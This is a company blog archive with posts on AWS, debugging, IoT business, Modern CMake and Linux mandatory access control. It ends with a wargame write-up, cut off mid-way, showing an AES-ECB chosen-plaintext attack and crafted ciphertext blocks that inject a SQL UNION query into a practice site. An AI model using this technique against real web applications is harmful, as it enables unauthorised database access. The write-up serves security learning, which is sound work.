
Programming

An Introduction to AWS Cloud Development

October 22, 2019 by Scionova

My experience with Cloud Development

Roughly one year ago I began developing in AWS (Amazon Web Services), and I could immediately see what all the buzz was about. AWS and other cloud platform providers (Azure, GCP, etc.) supply an immense number of services, both managed and unmanaged, ranging from completely serverless offerings to dedicated servers over which the customer has (almost) complete control. These services provide the tools to develop scalable, secure, agile and cost-efficient applications, where hardware, servers and OS management can be abstracted away to allow more focus on the actual code of your application.

In the past year I have been involved in the development of a microservice in AWS, and the past month has been spent preparing for, and later passing, the AWS Certified Solutions Architect – Associate exam.

 

What problems could be solved by using a Cloud Platform?

Imagine that you are part of a start-up aiming to develop a platform that provides a marketplace where autonomous car owners can make their vehicles available for hire when they are not using them themselves. Traditionally, starting development of such an application requires servers to run the application and its databases, as well as other hardware, e.g. network equipment to enable connection to the internet.

As development continues, changes in requirements might require additional hardware to be purchased or existing hardware to be replaced. Build tools and other CI-related tools are required to ensure the quality of your platform, all of which need their own servers. Moving the solution to production might require yet another set of equipment, with the capacity to handle the load spikes of a production environment.

To minimize downtime of the platform, backup servers will have to be purchased. All this equipment requires a capital investment which might not be available to your start-up without the assistance of an external investor. In the cloud, services are paid for in a pay-as-you-go model: no up-front investment is required, which better fits the financial situation of your start-up.

 

Serverless Architecture

For the last couple of years, ‘Serverless’ has had a huge impact on the industry. But what does it really mean to have a Serverless Architecture? Traditionally, applications have been installed on a specific physical server, where everything from hardware to application requires maintenance. With a serverless architecture, the only concern for the developer is the code of the application. The rest is left to the cloud provider to maintain. Of course, this does not mean that code is not running on a server, only that it is not important which server the code runs on.

Other than reduced maintenance, a serverless architecture brings automated scaling of your environment, a cost model that depends on the actual utilization of the services and a more microservice-friendly infrastructure.

 

AWS Services

These are some AWS services which could provide an entry point for someone who wants to get acquainted with the AWS ecosystem:

 

  •       AWS CloudFormation (https://aws.amazon.com/cloudformation) – An effective tool to describe your AWS infrastructure resources as code (YAML, JSON) in CloudFormation templates. This enables you to store the specification of your entire infrastructure in version control. When changes are made to the template, CloudFormation calculates the delta against the deployed set of resources as a change set, and then executes that change set. Having your infrastructure as code is also crucial when managing multiple staging environments (Dev, QA, Prod etc.), where it is important that the environments are identical to facilitate code and infrastructure quality assurance. An alternative to CloudFormation is Terraform, an open-source, platform-independent tool for describing infrastructure (https://www.terraform.io).

 

  •       AWS Lambda (https://aws.amazon.com/lambda) – This is the core of any serverless application developed in AWS. A Lambda basically consists of the code that you want to execute and something that triggers it, e.g. an API being called or a database table being updated. When the Lambda is triggered, the supplied code is deployed and executed, and shortly after the execution finishes the deployment is removed. Parallel triggerings of a Lambda result in multiple parallel deployments of the code, which scales to very high degrees of parallelism (subject to account-level concurrency limits). The cost of a Lambda is based on the number of executions and a combination of the execution time and the amount of memory allocated for the Lambda code.

 

  •       Amazon EC2 (https://aws.amazon.com/ec2) – Elastic Compute Cloud – EC2 is a service that provides a virtual machine, or “instance”, on a server in AWS. When deploying an instance, it is possible to choose from an abundance of instance types and pre-configured operating systems with different application setups. Instance types range from cheaper general-purpose instances to more expensive specialized ones, e.g. instances equipped with more graphics resources for graphics-intensive or machine learning workloads. Each instance type also comes in several sizes to support workloads of varying load.

 

  •       Amazon VPC (https://aws.amazon.com/vpc) – Virtual Private Cloud – VPC is used to set up a network in AWS. The network can then be equipped with subnets with different CIDRs, NAT gateways, internet gateways, load balancers, services to connect the network to an on-premises network, etc. – all without setting up any hardware yourself. EC2 instances can be deployed in public and private subnets to provide a tiered application setup where database instances and back-end instances (in the private subnet) are only accessible through the front-end instances (in the public subnet).

 

  •       Amazon ECS (https://aws.amazon.com/ecs) – Elastic Container Service – A container orchestration service provided by AWS that supports Docker containers. The service is available in two modes, EC2 and Fargate. The EC2 mode requires the developer to manage the EC2 instances that the containers run on, as well as the scaling of the number of instances, while the Fargate mode is fully managed in this regard. An open-source alternative to Amazon ECS is Kubernetes (https://kubernetes.io).

 

  •       Amazon DynamoDB (https://aws.amazon.com/dynamodb) – DynamoDB is a fully managed NoSQL database that provides great performance and is highly scalable. DynamoDB together with AWS Lambda and Amazon API Gateway (https://aws.amazon.com/api-gateway) provides all the tools required to build a small, simple and completely serverless microservice (see the sketch after this list). A NoSQL database is an excellent fit for applications with well-defined database access patterns, i.e. the queries that will be executed are known at the design phase and the NoSQL table(s) can be designed accordingly. However, for applications with more ad hoc database access patterns, a SQL database would be a better choice. This session from AWS re:Invent 2018 (https://www.youtube.com/watch?v=HaEPXoXVf2k) takes a deep dive into DynamoDB and explains when a NoSQL database should be utilized.

 

  •       Amazon S3 (https://aws.amazon.com/s3) – Simple Storage Service – A managed object storage service which provides a whopping 99.999999999% durability for any stored object, achieved by storing the objects in multiple data centers across a Region (a Region comprises a set of Availability Zones, which in turn comprise sets of data centers). S3 is used for storing different types of files, e.g. videos, images and documents. Some features of S3 include versioning of objects, replication of objects to another AWS Region, archiving objects to cheaper storage options when they are no longer frequently accessed (e.g. Amazon S3 Glacier, https://aws.amazon.com/glacier), hosting static web content, etc.
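
To make the Lambda + API Gateway + DynamoDB combination above concrete, here is a minimal sketch of a Python Lambda handler behind an API Gateway endpoint, using boto3. The table name, its key schema and the request format are assumptions made purely for illustration:

import json
import os

import boto3

# Hypothetical table with partition key "vehicleId" (illustration only).
TABLE_NAME = os.environ.get("TABLE_NAME", "Vehicles")
table = boto3.resource("dynamodb").Table(TABLE_NAME)

def handler(event, context):
    """Triggered by API Gateway; registers a vehicle as available for hire."""
    body = json.loads(event["body"])  # API Gateway proxy integration body
    table.put_item(Item={
        "vehicleId": body["vehicleId"],
        "available": True,
    })
    return {
        "statusCode": 200,
        "body": json.dumps({"registered": body["vehicleId"]}),
    }

Wiring this function to an API Gateway route yields a complete request path with no servers to manage, where both the function and the table scale (and are billed) with actual usage.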

 

Some things to be aware of

As mentioned, cloud development offers lots of opportunities moving forward. However, there are some things to take into consideration when deciding whether to move your solution to the cloud. Platform lock-in is one. Choosing a cloud provider will most likely make you dependent on that company’s offering, which leaves you vulnerable to changes in the price or functionality of the services you use.

Another consideration is the difference in pricing model compared to traditional development. Services in the cloud, especially managed services, are often priced per invocation and/or per unit of data transferred/processed/stored. This model might not suit solutions that have an even, non-fluctuating load over time; in that case a fleet of EC2 instances could be a better fit. Neglecting this detail when designing a solution could result in unnecessarily high costs.

Being well-prepared when designing a solution is key to avoiding these pitfalls. The AWS Well-Architected Framework (https://aws.amazon.com/architecture/well-architected) provides guidelines on how to architect a solution with performance, security, cost etc. in mind.

 

If you are interested in starting your journey in the cloud in general and AWS in particular and are eager to learn more about the possibilities and risks of cloud development, do not hesitate to contact me at Daniel.Andersson@scionova.com.

 

Debug your way to understanding

September 24, 2019 by Scionova

This blog post will give you some practical tips on how to make your debugger your best friend, if it is not already. If you are new on the job and thrown into a big legacy system, it can sometimes be really difficult to understand the flow of the code. Even when you are familiar with the codebase, a particularly complicated piece of code may leave you stumped. A debugger can be a helpful tool for understanding what is happening and where information stems from. Going back to basics and really getting to know how the debugger(s) in your IDE(s) work can be a real boost.

 

This blog post is not supposed to be a tutorial for any one IDE. Instead, I will go through debugging concepts that are present in most IDEs, as well as some nifty tricks found in specific debugging tools. I am most familiar with the Eclipse debugging tool, so most of my references will point there. However, the concepts that I cover are present in most debugging tools.

 

Get to know your break points

Debugging is stepping through your code, line by line, while monitoring the changes to the variables in your code. Most of the time you are not interested in each and every line of code; you are interested in a specific part of the code or a specific variable. As such, you want to be able to tell your debugger when it should pause execution for closer inspection. You do this with breakpoints.

 

The most basic breakpoint will simply stop the execution at the given line; however, you can do much more with breakpoints! One of my most used breakpoints is the conditional breakpoint. As the name suggests, it will halt execution when a given condition is met or when a value changes. This allows you to focus on what is really important.
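
Conditional breakpoints are not an IDE-only feature; Python’s command-line debugger pdb supports them too, which makes for a compact illustration. A minimal sketch (the file name and values are made up for the example):

# debug_demo.py - one iteration out of thousands misbehaves.
def total(values):
    s = 0
    for v in values:
        s += v  # line 5: a good spot for a conditional breakpoint
    return s

if __name__ == "__main__":
    data = [1] * 10000
    data[8391] = -999  # the needle in the haystack
    print(total(data))

Running python -m pdb debug_demo.py and issuing break debug_demo.py:5, v < 0 followed by continue halts execution only on the one bad iteration, instead of stopping thousands of times.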

 

A really helpful breakpoint is the exception breakpoint. If you have no idea why an exception is thrown and you want to find out the cause, an exception breakpoint will halt execution right when the exception is triggered. It is then easy to see what triggers the exception, and what the cause of that trigger is.

 

If you are working with a multi-threaded application and you want to follow the execution of a specific thread, you can filter a breakpoint on that thread. Then you can follow the execution of that thread without being confused by the others.

 

You can also do some additional things with breakpoints, such as suspending execution only when a breakpoint has been hit a certain number of times, or suspending all breakpoints until a certain breakpoint has been reached.

 

Get to know the controls 

When you have reached the code of interest for debugging, you may want to follow the execution more closely. To do this you have some progression controls at your disposal. 

 

The basic progression controls for debugging are fairly self-explanatory. The step into option will go into the statement you are currently at. The step over option, in contrast, will jump over the statement and show you the result afterwards. This means that if you choose to step over a big method, you do not have to follow execution through the entire method; you will only see the result.

 

The final basic progression tool is step return, which will take you out to the caller of the current statement. If you are in a method, this means you go back to the place where the method was called.
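
For reference, the same three controls exist in command-line debuggers as well; in Python’s pdb they are called step, next and return:

(Pdb) step    # step into: descend into the call on the current line
(Pdb) next    # step over: execute the whole line and stop at the next one
(Pdb) return  # step return: run until the current function returns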

 

A lesser known but very useful progression option is drop to frame. Using it will take you back to the beginning of the frame you are currently in. In the case of a method, this means you are taken back to the very top of the method. This can be very useful when tracking down where an issue originates. You might step over a piece of code with the step over function and find that a method call is the root of your error. Unfortunately, stepping backwards is generally not an option while debugging. Drop to frame, however, will take you back to the beginning of the piece of code you are currently in, and you can choose to step into the offending statement this time.

 

The drop to frame option is also very useful if your IDE and debugger allow hot changes, that is, changing the code while debugging without having to recompile and rerun your application. If you are working on a big project that takes a long time to compile or run, this can be a great time-saver. In Eclipse, while working with Java, you can make code changes that do not affect method headers or similarly big structures. After making a change and saving, you are automatically brought to the top of the frame, allowing very quick feedback on your change.

 

If you are working with an application that is triggered by another application, you may think that you cannot debug it properly. These kinds of situations can be really difficult, as it is not the application you want to debug that drives the execution. However, if you are developing in Visual Studio you are in luck! Visual Studio allows you to attach the debugger to a running process, which in turn triggers the execution in the application you are debugging. To do this, go to Debug > Attach to Process and select the process to which you want the debugger to attach.

 

Make friends 

While debugging may seem basic, and the prospect of debugging your own or others’ code may be daunting, I have found that it really helps me understand the applications I am developing. While I was still a student, I rarely saw the use of the debugger; it was mostly just a bothersome tool that never wanted to work for me.

 

When I started working on a bigger project with more complicated data structures, I realized how useful it can be. Getting familiar with the tools and options available to me showed me how essential good debugging skills are to my work as a developer. It takes some getting used to, but as the saying goes, practice makes perfect, and these days the debugger is my most beloved development tool. I hope this blog post has given you some food for thought and has perhaps introduced some concepts that you were not aware of before.

 

Best regards,

Lisa

 

IoT… as a Business Approach.

August 12, 2019 by Scionova

We are living in a turbulent world where competition is becoming hyperturbulent. New and existing companies must take seriously the job of continually initiating, and adjusting to, the new Industry 4.0. Internet of Things (IoT) technology is causing immense disruption across many industries, with the pace of change increasing every day. However, not everything is about high-tech connected solutions or state-of-the-art technology development; the business of IoT is more than that.

 

Cutting-edge technology… just one more player.

We all take for granted that our TV is connected to the internet, our smartphone communicates with our watch, and the smart indoor heating system always delivers the perfect temperature (especially in the freezing Swedish winter). Yes, the internet has given most of the world’s population unlimited access to data and technology. But technology is not the only player needed to develop an IoT business and monetize its benefits.

 

The innovation should not be in technology only; it should also include the development of a new business model and a delivery method for IoT services for other organizations and end customers. Technology gives us a lot of possibilities for creating innovative solutions, but if we cannot materialize them into a business, a great idea might remain just a great design. An IoT business encompasses additional critical players that together create the perfect match for embarking on the “IoT journey”.

 

The focus on technology in IoT services means that the business aspects are often overlooked. Successful IoT services are built on the premise of a clearly defined service offering complemented with operational and business models. There is a tendency to treat each of these views in isolation, but effective IoT services onboard these models in parallel.

 

Cultural (tech) fact: 

Did you know that the concept of a smart IoT device was introduced back in 1982? A modified Coke machine at Carnegie Mellon University (Pittsburgh, USA) became the first internet-connected appliance. This Coke machine was able to report its inventory and whether newly loaded drinks were cold.


The Business of IoT.

I remember a conference where the speaker said: “If you haven’t started in the IoT, you are already late”. That is not completely accurate. IoT will be “alive” for a long time, and we need to take advantage of this with new IoT services, ideas and business models. You will never be too late with innovative ideas, and IoT offers a vast range of possibilities.

 

The basic components of a business are: a good product, a reliable business model and customers. Of the latter we have plenty, at least in terms of connected devices. Intel, for instance, projects the number of connected devices to grow from 2 billion in 2006 to 200 billion by 2020, which would mean nearly 26 smart devices for each human on Earth. Others, such as Gartner, which takes smartphones, tablets and computers out of the equation, estimate 20.8 billion connected devices by 2020.

 

Hence we need to understand the business aspects of the disruption caused by IoT and how to take advantage of the coming opportunities.

 

Technology is only one of many tools needed to develop a successful, profitable and sustainable IoT business. There is literature explaining the different aspects to consider when developing IoT services to create a successful IoT business, but I would like to mention the two that I consider the most important:

 

  • Ecosystems:

    In simple words, for IoT to reach its full potential, it will require several ecosystems and currently “non-cooperating” industries to work together to maximize business.

 

  • IoT as a Service (AaS):

    A “pay-as-you-grow” model in which the customer pays in proportion to their usage of the service. This enables a low initial investment, scalability and cost control.

 

IoT business is not solely about technology; it involves multiple aspects that must be attended to in parallel. Many IoT projects are condemned to fail as profitable businesses if the people within the organizations do not consider business-relevant aspects as important as technology development throughout the entire product lifecycle.

 

Best regards,

 

Why not not Modern CMake

June 28, 2019 by Scionova

Lately I have worked a lot with the build framework/system in the project of my current assignment in automotive. Doing so, I have noticed the benefits of writing CMake that conforms to what is called ‘Modern CMake’, or rather the drawbacks of not doing so. Therefore, I’d like to take the opportunity to share my experience.

 

This will not be a complete description of what Modern CMake is; there are loads of articles about that, and here is a good entry point to Modern CMake. However, I’ll give you a few do’s and don’ts along with the issues I had when these were not followed. My main advice is to think of CMake as any other production code and demand quality, readability and maintainability.

  • Do not use global functions such as include_directories or link_libraries. These often shroud what targets actually use and need. Use functions such as target_include_directories and target_link_libraries to modify each target explicitly instead (see the sketch after this list).
  • Do not modify CMAKE_CXX_FLAGS in subprojects. The project might change to a compiler that does not support all the flags the old one did. This kind of variable should be modified in the top-level CMakeLists.txt or, preferably, in a toolchain file.
  • Use ALIAS targets so that add_subdirectory and find_package export the same names for targets. The issue I saw in my current project arose when we started to build an external library instead of using prebuilt binaries (or vice versa), and the target_link_libraries calls of all the dependent components needed to be updated.
  • Do not use target_include_directories with paths reaching outside the directory of the component. The project might change its file structure, and all these paths would need to be updated. Instead, export the needed header files from the other component, either with target_include_directories with PUBLIC properties or simply by exporting an INTERFACE library.
  • Provide well-defined and documented functions for adding tests at the project level. The main benefit is that it is easier to change the behaviour of the tests and how they are used in CI gates if naming conventions and label use are centrally enforced/implemented once.
  • Use cmake_parse_arguments when implementing custom functions. Implementing the same functionality yourself might introduce unnecessary complexity or obscurity.
  • Do not overdo the use of variables. When debugging CMake and/or the binaries, it might prove challenging to expand all the variables in your head.
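
To make the target-centric style concrete, here is a minimal sketch; the project, target and file names are hypothetical:

# mylib/CMakeLists.txt - a self-contained component in the Modern CMake style.
add_library(mylib src/mylib.cpp)
add_library(myproj::mylib ALIAS mylib)  # consumers use the same name whether the
                                        # target comes from add_subdirectory or find_package

# Consumers inherit the public include path; only mylib itself sees src/.
target_include_directories(mylib
    PUBLIC  ${CMAKE_CURRENT_SOURCE_DIR}/include
    PRIVATE ${CMAKE_CURRENT_SOURCE_DIR}/src)

# Link dependencies per target instead of globally with link_libraries().
target_link_libraries(mylib PRIVATE myproj::otherlib)

# app/CMakeLists.txt
add_executable(app main.cpp)
target_link_libraries(app PRIVATE myproj::mylib)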

Further Reading 

As I mentioned before, there are a multitude of articles about Modern CMake and how to follow it; here are some of them:

  • Effective Modern CMake 
  • An Introduction to Modern CMake 
  • It’s Time to Do CMake Right 
  • More Modern CMake 

 

Hope you enjoyed my blog post!

 

Best Regards,

Patrik Ingmarsson

Securing Linux with Mandatory Access Control

April 8, 2019 by Abhijeet Shirolikar

Security is a growing concern for any software. Every now and then, new vulnerabilities are reported, even in the Linux kernel.

Effective use of the access control provided by the operating system can help mitigate software vulnerabilities. Most people are familiar with the Discretionary Access Control (DAC) available in UNIX-like operating systems.

DAC restricts access to resources based on users and/or the groups they belong to. For example, the owner of a file can set read, write and execute permissions, so a user is in control of who can access and modify a resource. In other words, access to a resource is at the user’s discretion.

This creates a problem: a compromised program inherits the access rights of the user and can therefore do anything that user can do. If a compromised process happens to be running with effective superuser privileges, an attacker can take full control of the system. This is undesired, to say the least.

Instead of deciding what a program can and cannot do based on DAC measures, it is more secure to let programs do only what they need to perform their tasks. Then, even if a program runs with effective root privileges, it cannot do anything other than what it is explicitly allowed to do. This type of control over capabilities and permissions is called Mandatory Access Control (MAC).

Mandatory Access Control (MAC) is implemented using the Linux Security Modules (LSM) framework integrated into the kernel. LSM is a generic framework that allows different MAC extensions to be implemented by loading different kernel modules. The modules rely on kernel hooks, which in turn allow them to extend the kernel’s behavior.

A system call executed by a user process traverses the kernel’s existing logic for resource lookup, error checks, and DAC checks. Once all of these checks have passed, and just before the kernel grants access to the resource, an LSM hook calls into the active security policy to decide whether access should be granted or denied.

Some of the hooks provided by LSM are:

  1. Module hooks – to provide control over module loading and unloading
  2. Network hooks – to provide control over sockets, the transport layer, the network layer, etc.
  3. Task hooks – to provide control over the lifecycle of a task
  4. Virtual file system hooks – to provide control over superblock, inode, and actual file operations
  5. IPC hooks – to provide control over IPC mechanisms like message queues, shared memory, and semaphores

MAC extension developers can then use these hooks to implement their access control logic.

Some of the officially accepted Linux kernel MAC extensions are Security-Enhanced Linux (SELinux), Simplified Mandatory Access Control Kernel (SMACK) and Application Armor (AppArmor).

In the next blog post, I will write about my experiences with SELinux. 


Best Regards,

Abhijeet Shirolikar, Senior Software Developer

Wargames – A web Application Hack

February 22, 2019 by Scionova

$> WARGAMES

Even though my daily work usually has little to do with security, I consider it a virtue to keep up to date with security basics and to try to maintain a certain breadth in my technical knowledge.

But perhaps more importantly, I find it to be a lot of fun to engage in what’s known as “wargames” – simulated hacking challenges which test one’s skills and reasoning.

If you’re a programmer with a knack for security you might have heard the term “CTF”, or “Capture The Flag” – events where individuals or teams compete to be the first to solve a set of challenges. Wargames are essentially the same, but without the time limit typically associated with CTFs, and many of them are focused on teaching basic techniques rather than having you figure out novel approaches to convoluted problems.


$> THE FLAVOUR OF THE DAY: WEB

As one might expect, there are many kinds of wargames. Common broad themes include web applications, cryptography and binary exploitation (abusing buffer overflows and the like). Harder wargames can require knowledge of many different topics and of obscure language and/or configuration features.

I’m terrible with the web software stack and have therefore been afraid of trying web-themed wargames for a long time. I finally decided to change that by learning a bit and seeing how far I would get. This post describes my way through one particularly interesting challenge I recently encountered after succeeding with some easier ones.

WARNING: Contains spoilers for a single level in a specific web wargame. It’s not the only writeup of this level, but you might still want to stop reading if it sounds like something you would rather tackle by yourself.


$> GOAL

The goal of this challenge is simple: get the password to the next level. We know that the password can be found in the file /etc/passwords/password29 on the server if we can access it somehow, or it might be stored in some additional place we can get our hands on.

Let’s get right on it!


$> POKING AROUND

We land on a webpage that seems to host some sort of joke database. There appears to be a search feature which accepts input from us, and a notice proclaiming that this time we won’t be seeing the source code for the application we’re exploiting. Awww.

Let’s see what happens when we input some things manually…

(Screenshot: a search for a joke and its result.)

It’s hilarious!

 

The normal use seems simple enough: there exists a database of jokes, and we can search for text contained in them. Up to three are randomly picked if our query matches several entries.
After some trial and error, it seems like the application gracefully handles the good old SQL injection workhorses – quotes, dashes, pound signs and what have you.

But the URL looks interesting. And if something stands out in a wargame, it probably is.

If we manually mess with this URL, we get an interesting error.

(Screenshot: the server responds with a padding error.)

A cursory DDG search reveals that this problem is usually related to AES encryption. That’s a good pointer.


$> SITEMAP

Based on what happens with our input and what we can see from the source code of the webpages, this is the sitemap we get:

http://site.name/ (same as index.php)
http://site.name/index.php
http://site.name/search.php

The input box on index.php results in an HTTP POST request to search.php, which eventually gets redirected to an HTTP GET with a transformed query parameter.

Otherwise there’s little of interest that we can glean from the source code of the pages.

(Also, calling search.php without parameters yields a cryptic result: just the string “mep”. This led me on a wild goose chase for a *.pem file (crypto certificate) that I half expected to be able to find. I can’t know for sure there isn’t one, but my time was certainly wasted. This can be interpreted as the site admins being cruel, or me being stupid – the latter of which is a terrible thought to entertain.)


$> STUDYING THE RESULTING URLS

Inputting the string ‘aaaaaaaaaaaa’ as query yields the following URL:
http://site.name/search.php?query=G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OezoKpVTtluBKA%2B2078pAPR3X9UET9Bj0m9rt%2Fc0tByJk%3D

Let’s pick out the query part:
G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OezoKpVTtluBKA%2B2078pAPR3X9UET9Bj0m9rt%2Fc0tByJk%3D

And urldecode it:
G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OezoKpVTtluBKA+2078pAPR3X9UET9Bj0m9rt/c0tByJk=

Alphanumeric, with the addition of plus signs and slashes and equal signs at the end? Looks like base64.
Just decoding it to stdout messes up my terminal, so we’re looking at binary data. Let’s get a hexdump instead:

00000000: 1be8 2511 a7ba 5bfd 578c 0eef 466d b59c ..%...[.W...Fm..
00000010: dc84 728f dcf8 9d93 751d 10a7 c75c 8cf2 ..r.....u....\..
00000020: c087 2dee 8bc9 0b11 5691 3b08 a223 a39e ..-.....V.;..#..
00000030: ce82 a955 3b65 b812 80fb 6d3b f290 0f47 ...U;e....m;...G
00000040: 75fd 5044 fd06 3d26 f6bb 7f73 4b41 c899 u.PD..=&...sKA..

Yikes, I can’t make heads or tails out of it!
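
For reference (jumping ahead a little to the python3 tooling that appears later), the decode pipeline is only a few lines:

import base64
from urllib.parse import unquote

query = ("G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6"
         "OezoKpVTtluBKA%2B2078pAPR3X9UET9Bj0m9rt%2Fc0tByJk%3D")
raw = base64.b64decode(unquote(query))  # urldecode, then base64-decode
print(raw.hex(" "))                     # binary data, so print it as hex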

Trying out more human-pseudo-random values with a quick and dirty bash/curl script gives the following bits of knowledge:

  • The initial 32 bytes are always the same.
  • The output is deterministic (the same input always results in the same output).
  • Curiously, a string consisting of just a bunch of percent signs results in jokes being displayed, despite none of the jokes containing percent signs.


$> CIPHER MODE DISCOVERY

Eventually, I ended up trying a really long repetition of a single character as input.
The result was the following:

00000000: 1be8 2511 a7ba 5bfd 578c 0eef 466d b59c ..%...[.W...Fm..
00000010: dc84 728f dcf8 9d93 751d 10a7 c75c 8cf2 ..r.....u....\..
00000020: c087 2dee 8bc9 0b11 5691 3b08 a223 a39e ..-.....V.;..#..
00000030: b390 38c2 8df7 9b65 d261 51df 58f7 eaa3 ..8....e.aQ.X...
00000040: b390 38c2 8df7 9b65 d261 51df 58f7 eaa3 ..8....e.aQ.X...
00000050: b390 38c2 8df7 9b65 d261 51df 58f7 eaa3 ..8....e.aQ.X...
00000060: b4ed a087 d3c0 bea2 bedc 1b61 40b9 e2eb ...........a@...
00000070: ca8c f4e6 1091 3aba e39a 0676 1920 4a5a ......:....v. JZ

This is really good information – it reveals that blocks are encrypted independently of each other (Electronic CodeBook mode rather than Cipher Block Chaining), and that they are 16 bytes (128 bits) long.
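
Identical plaintext blocks producing identical ciphertext blocks is the classic ECB tell, and it is easy to test for programmatically. A small sketch:

def repeated_blocks(ciphertext: bytes, block_size: int = 16) -> int:
    # Count duplicate blocks; anything above zero smells like ECB.
    blocks = [ciphertext[i:i + block_size]
              for i in range(0, len(ciphertext), block_size)]
    return len(blocks) - len(set(blocks))

Feeding it the dump above returns 2, courtesy of the three identical middle blocks that gave the mode away.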


$> CRACKING THE KEY

Yet another search engine query, this time on the subject of cracking 128-bit ECB AES, reveals that without more information about the key it would take approximately “Forever” to do that. It’s unlikely that we have that much time at our disposal, so let’s look elsewhere.


$> CIPHERTEXT LAYOUT

We can now, however, figure out the layout of the ciphertext. (This is also where I moved from my shoddy shell script to the modern world with python3 and requests to better be able to automate it.)

I inserted ‘a’ characters one at a time until obtaining the first instance of the now familiar ciphertext of a block of 16 ‘a’ characters. This happened after 26 characters. We know from earlier that the first two 16-byte blocks are always the same, so there are six unknown bytes in the third.

Moving on from there, I inserted more ‘a’ characters until the ciphertext length increased by one block. This happened after three more characters. As per the specification of PKCS#7, if the length of the source mod the block size is zero, a full block of padding needs to be added. That means that three bytes in the last block earlier were just padding.

(Also that netted us the ciphertext of a valid padding-only block that we can use later.)

Putting all of this together, the result is as follows:

Legend:
P = unknown prefix
a = our query string
S = unknown suffix

PPPPPPPPPPPPPPPP
PPPPPPPPPPPPPPPP
PPPPPPaaaaaaaaaa
aaaaaaaaaaaaaaaa
SSSSSSSSSSSSSSSS
SSSSSSSSSSSSS

While we can’t really know what the unknown parts are, it’d be reasonable to guess that in one way or another they’re related to querying a database, be it SQL or some clever php grepping in a directory with plain text files.


$> DECIPHERING THE TAIL (FAIL)

With this recent knowledge in hand, it seems straightforward enough to figure out the suffix:

By reducing the length of our input by one, we should get the ciphertext for the following:

PPPPPPPPPPPPPPPP
PPPPPPPPPPPPPPPP
PPPPPPaaaaaaaaaa
aaaaaaaaaaaaaaaS -- b'abc123...'
SSSSSSSSSSSSSSSS
SSSSSSSSSSSS

Then, if we extend our input by one byte, iteratively trying out values for all possible bytes until we get the same ciphertext, we should be able to decipher the data one byte at a time.
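
In sketch form, with encrypt() standing in for a request to search.php that returns the raw ciphertext, and assuming our input has already been aligned to a block boundary (the names and structure here are mine, not from the challenge):

def recover_suffix(encrypt, block_size=16, max_len=64):
    known = b""
    for _ in range(max_len):
        # Pad so that the next unknown byte lands last in a block we control.
        pad = b"a" * (block_size - 1 - len(known) % block_size)
        end = (len(pad) + len(known)) // block_size * block_size + block_size
        target = encrypt(pad)[end - block_size:end]
        for candidate in range(256):
            guess = pad + known + bytes([candidate])
            if encrypt(guess)[end - block_size:end] == target:
                known += bytes([candidate])
                break
        else:
            return known  # no candidate matched; we probably hit the padding
    return known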

Unfortunately, for mysterious reasons, this seemed to work for only a single byte (‘%’ – a percent sign), after which nothing would yield a matching ciphertext. I dabbled a while trying to figure out whether I had messed up something with my URL encoding or so… but to no avail.

At this point I was at my wit’s (and weekend’s) end and let the problem rest for a few days.


$> A GIFT FROM THE GODS

While doing completely unrelated things at work, I stumbled across a SQL query like this:
"SELECT thing FROM things WHERE content LIKE 'prefix_%'"

And I remembered the recent percent sign oddity, and the one from the start of the challenge, and suddenly everything fell into place. And by everything I mean both the realization that I clearly need to study more SQL, and what seems to be happening behind the scenes in the challenge.

(For reference: ‘%’ acts as a wildcard for ‘zero or more characters’ in SQL LIKE. Underscores match a single character, and I could quickly verify that our query treated these characters exactly so.)

We can now make a proper, qualified guess at what’s hidden in the ciphertext:

SELECT * FROM JO
KES WHERE JOKE L
IKE '%aaaaaaaaaa
aaaaaaaaaaaaaa%'
COLLATE latin1_
general_cs_as

(Database people might observe that parts of this guess are very likely way off, but it’s good enough to get us moving forward.)

Come weekend, I leaped back into the fray.


$> CRAFTING

We now have a way forward – conceptually as easy as your run-of-the-mill SQL injection; we just have to mold our payload into a format that the application accepts.

So let’s make some blocks. We’ll craft something like this:

Legend:
P = unknown prefix
a = our padding and canaries
Q = the input we want ciphertext for
S = unknown suffix

PPPPPPPPPPPPPPPP
PPPPPPPPPPPPPPPP
PPPPPPaaaaaaaaaa
aaaaaaaaaaaaaaaa
QQQQQQQQQQQQQQQQ
aaaaaaaaaaaaaaaa
SSSSSSSSSSSSSSSS
SSSSSSSSSSSSS

So for example, if we want the ciphertext for “16 BYTES OF JUNK”, we send in a query string like:

“aaaaaaaaaaaaaaaaaaaaaaaaaa16 BYTES OF JUNKaaaaaaaaaaaaaaaa”

And we should get a result with ciphertext blocks like:

...
b'b39038c28df79b65d26151df58f7eaa3' (canary)
b'deadbeefdeadbeefdeadbeefdeadbeef' (what we want)
b'b39038c28df79b65d26151df58f7eaa3' (canary)
...

And we can keep saving values for interesting 16-byte blocks to be used in our payload.

It turns out, however, that some inputs corrupt the canary value after our expected 16-byte ciphertext block – most noticeably quotes and backslashes. As is customary, it’s time to guess why. I’d fathom a likely candidate is that mysqli_real_escape_string is called on the input before our query is encrypted.

That means we can’t easily place quotes in the middle of a block. But we can feed this to the application:

aaaaaaaaaaaaaaa'
DataDataDataDat

To produce a ciphertext equivalent of:

aaaaaaaaaaaaaaa\
'DataDataDataDat

Like so:

(Screenshot: crafting the ciphertext blocks.)

That’ll be enough for our purposes.


$> THE ATTACK

We now know how to craft our own ciphertexts and have a good idea of what the backend is doing.
We also observe that we can ignore the suffix of the query and replace it with the full padding block ciphertext we acquired earlier to shorten our query a bit and not have the suffix interfere with our experiments.

At this point I attempted many times to craft something useful and failed for various more or less stupid reasons. But since I’m writing this from a retrospective angle, I can pretend that I immediately arrived at this point:

SELECT * FROM JO -- b'1be8251117ba5bfd578c0eef466db59c'
KES WHERE JOKE L -- b'dc84728fd2f89d93751d10a7c75c8cf2'
IKE '%aaaaaaaaaa -- b'c0872dee8b390b1156913b08a223a39e'
' UNION SELECT   -- b'36c550994e94298f5a065ac38ea9cbd7'
1;#              -- b'9fb2c82683985bd21224f4a1dd70507e'
<16 byte pad>    -- b'75fd5044fd063626f6bb7f734b41c899'

If we concatenate those values, base64-encode the block, URL-encode the result, and send it to search.php, we get the following:

(Screenshot: the result of the crafted query.)

Looks very promising!
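
For reference, the concatenate-encode-send step with python3 and requests looks roughly like this (site.name stands in for the real host; the hex strings are the harvested blocks listed above):

import base64
from urllib.parse import quote

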